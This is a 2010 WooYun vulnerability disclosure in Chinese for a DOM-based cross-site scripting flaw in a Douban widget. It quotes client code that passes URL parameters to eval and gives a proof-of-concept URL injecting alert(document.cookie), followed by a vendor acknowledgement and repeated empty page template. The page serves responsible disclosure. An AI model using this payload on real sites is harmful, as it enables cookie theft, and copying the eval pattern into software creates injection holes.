douban某功能存在跨站脚本漏洞 | wooyun-2010-0894

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2010-0894

漏洞标题：

douban某功能存在跨站脚本漏洞

漏洞详情

披露状态：

2010-12-02：细节已通知厂商并且等待厂商处理中
2010-12-03：厂商已经确认，细节仅向厂商公开
2010-12-13：细节向核心白帽子及相关领域专家公开
2010-12-23：细节向普通白帽子公开
2011-01-02：细节向实习白帽子公开
2011-01-01：细节向公众公开

简要描述：

由于在某些客户端代码里存在安全问题导致会产生xss漏洞，一个典型的跨平台的灰常好用的dom xss

详细说明：

<script type="text/javascript">
var paras = function(s){
    var o = {};
    if(s.indexOf('?') == -1) return {};
    var vs = s.split('?')[1].split('&');
    for(var i=0;i<vs.length;i++){
        if(vs[i].indexOf('=') != -1){
            var k = vs[i].split('=');
            eval('o.'+k[0]+'="'+k[1]+'"');
        }
    }
    return o;
}
var recurl="http://alert()",args=paras(location.href);

一个location.href和一个典型的eval
漂亮，不是么？

http://www.douban.com/recommend/widget?src=alert()&title=abcdefg&a;alert(document.cookie)//=fff

：）

漏洞证明：

一千万只太阳的光辉
映照着金色的月亮
生命中最美丽的一天

修复方案：

don't be eval
:)

版权声明：转载请注明来源 xsser@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2010-12-03 15:22

厂商回复：

感谢！修复中

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xsser@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xsser@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞